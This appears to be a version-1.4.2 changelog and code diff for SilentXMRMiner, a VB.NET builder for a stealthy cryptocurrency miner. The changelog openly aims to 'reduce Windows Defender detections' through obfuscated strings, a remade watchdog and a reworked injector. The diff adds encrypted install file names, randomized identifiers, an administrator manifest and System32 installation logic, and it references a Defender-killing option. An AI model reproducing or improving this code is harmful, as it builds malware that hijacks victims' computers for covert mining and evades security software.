Updated to v1.4.2

* Remade watchdog to reduce detections
* Obfuscated more strings to reduce new Windows Defender detections
* Reworked a lot of the injector
* Fixed a bug where two environment variables for paths could return different results

README.md

@@ -1,7 +1,7 @@
 
 <img src="https://github.com/UnamSanctam/SilentXMRMiner/blob/master/SilentXMRMiner.png?raw=true">
 
-# SilentXMRMiner v1.4.1 - Based on Lime Miner v0.3
+# SilentXMRMiner v1.4.2 - Based on Lime Miner v0.3
 
 Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**.
 
@@ -41,6 +41,11 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w
 
 ## Changes
 
+### v1.4.2 (14/07/2021)
+* Remade watchdog to reduce detections
+* Obfuscated more strings to reduce new Windows Defender detections
+* Reworked a lot of the injector
+* Fixed a bug where two environment variables for paths could return different results
 ### v1.4.1 (10/07/2021)
 * Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners
 * Added backup servers for Online Downloader

SilentXMRMiner/Advanced.resx

@@ -122,7 +122,8 @@
   </metadata>
   <data name="Label7.ToolTip" xml:space="preserve">
     <value>Will try to install to System32, if unsuccessful it will try to install to the path chosen in the "Install" tab. It's recommended to enable this when using 'Run as Administrator'.
-This command requires Administrator privileges!</value>
+This command requires Administrator privileges!
+</value>
   </data>
   <data name="Label1.ToolTip" xml:space="preserve">
     <value>Pauses the miner compilation when the Watchdog DLL and/or Miner DLL is compiled to allow manual obfuscation of the file. 

SilentXMRMiner/Advanced.vb

@@ -26,27 +26,4 @@
             txtRemoteConfig.Enabled = False
         End If
     End Sub
-
-    Private Sub toggleKillWD_CheckedChanged(sender As Object) Handles toggleKillWD.CheckedChanged
-        If toggleKillWD.Checked Then
-            toggleAdministrator.Checked = True
-            toggleInstallSystem32.Checked = True
-        End If
-    End Sub
-
-    Private Sub toggleInstallSystem32_CheckedChanged(sender As Object) Handles toggleInstallSystem32.CheckedChanged
-        If toggleInstallSystem32.Checked Then
-            toggleAdministrator.Checked = True
-        End If
-    End Sub
-
-    Private Sub toggleAdministrator_CheckedChanged(sender As Object) Handles toggleAdministrator.CheckedChanged
-        If toggleAdministrator.Checked Then
-            toggleInstallSystem32.Checked = True
-            toggleKillWD.Checked = True
-        Else
-            toggleInstallSystem32.Checked = False
-            toggleKillWD.Checked = False
-        End If
-    End Sub
 End Class

SilentXMRMiner/Codedom.vb

@@ -11,7 +11,6 @@ Public Class Codedom
     Public Shared UninstallerOK As Boolean = False
     Public Shared F As Form1
 
-    Public Shared GlobalRProgram As String
     Public Shared Sub MinerCompiler(ByVal Path As String, ByVal Code As String, ByVal Res As String)
         MinerOK = False
 
@@ -21,10 +20,8 @@ Public Class Codedom
         Dim Parameters As New CompilerParameters
         Dim OP As String = " /target:winexe /platform:x64 /optimize "
 
-        GlobalRProgram = F.Randomi(F.rand.Next(5, 40))
-
         With Parameters
-            .GenerateExecutable = False
+            .GenerateExecutable = True
             .OutputAssembly = Path
             .CompilerOptions = OP
             .IncludeDebugInformation = False
@@ -69,13 +66,11 @@ Public Class Codedom
             Else
                 MinerOK = True
             End If
-
-            Try : IO.File.Delete(Environment.GetFolderPath(35) + "\icon.ico") : Catch : End Try
         End With
 
     End Sub
 
-    Public Shared Sub WatchdogCompiler(ByVal Path As String, ByVal Code As String)
+    Public Shared Sub WatchdogCompiler(ByVal Path As String, ByVal Code As String, Optional RequireAdministrator As Boolean = False)
         WatchdogOK = False
 
         Dim providerOptions = New Dictionary(Of String, String)
@@ -84,24 +79,25 @@ Public Class Codedom
         Dim Parameters As New CompilerParameters
         Dim OP As String = " /target:winexe /platform:x64 /optimize "
 
-        GlobalRProgram = F.Randomi(F.rand.Next(5, 40))
+        If RequireAdministrator Then
+            File.WriteAllBytes(Path & ".manifest", My.Resources.administrator)
+            F.txtLog.Text = F.txtLog.Text + ("Adding manifest..." + vbNewLine)
+            OP += " /win32manifest:""" + Path & ".manifest" + """"
+        End If
 
         With Parameters
-            .GenerateExecutable = False
+            .GenerateExecutable = True
             .OutputAssembly = Path
             .CompilerOptions = OP
             .IncludeDebugInformation = False
             If F.FA.toggleEnableDebug.Checked Then
                 .ReferencedAssemblies.Add("System.Windows.Forms.dll")
             End If
             .ReferencedAssemblies.Add("System.dll")
-            .ReferencedAssemblies.Add("System.Core.dll")
             .ReferencedAssemblies.Add("System.Management.dll")
 
             Dim watchdogbuilder As New StringBuilder(Code)
 
-            watchdogbuilder.Replace("#InjectionTarget", F.InjectionTarget(0))
-
             ReplaceGlobals(watchdogbuilder)
 
             Dim Results = CodeProvider.CompileAssemblyFromSource(Parameters, watchdogbuilder.ToString())
@@ -113,6 +109,10 @@ Public Class Codedom
             Else
                 WatchdogOK = True
             End If
+
+            If RequireAdministrator Then
+                File.Delete(Path & ".manifest")
+            End If
         End With
 
     End Sub
@@ -182,6 +182,7 @@ Public Class Codedom
             If RequireAdministrator Then
                 File.Delete(SavePath & ".manifest")
             End If
+            Try : IO.File.Delete(Environment.GetFolderPath(35) + "\icon.ico") : Catch : End Try
         End With
 
     End Sub
@@ -271,9 +272,9 @@ Public Class Codedom
 
             If F.FA.toggleInstallSystem32.Checked Then
                 stringb.Replace("DefSystem32", "true")
-                stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & ")," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")")
+                stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & "), Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))))")
             Else
-                stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & "," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")")
+                stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & ", Encoding.ASCII.GetString(RAES_Method(Convert.FromBase64String(" & Chr(34) & F.EncryptString(F.txtInstallFileName.Text) & Chr(34) & "))))")
             End If
 
 
@@ -331,7 +332,7 @@ Public Class Codedom
         stringb.Replace("RStart", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("RLoader", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("RUninstaller", F.Randomi(F.rand.Next(5, 40)))
-        stringb.Replace("RProgram", GlobalRProgram)
+        stringb.Replace("RProgram", F.Randomi(F.rand.Next(5, 40)))
 
         stringb.Replace("rarg1", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rarg2", F.Randomi(F.rand.Next(5, 40)))
@@ -348,6 +349,7 @@ Public Class Codedom
         stringb.Replace("rbD2", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rplp", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("rxM", F.Randomi(F.rand.Next(5, 40)))
+        stringb.Replace("rcheckcount", F.Randomi(F.rand.Next(5, 40)))
         stringb.Replace("startDelay", F.txtStartDelay.Text)
     End Sub
 End Class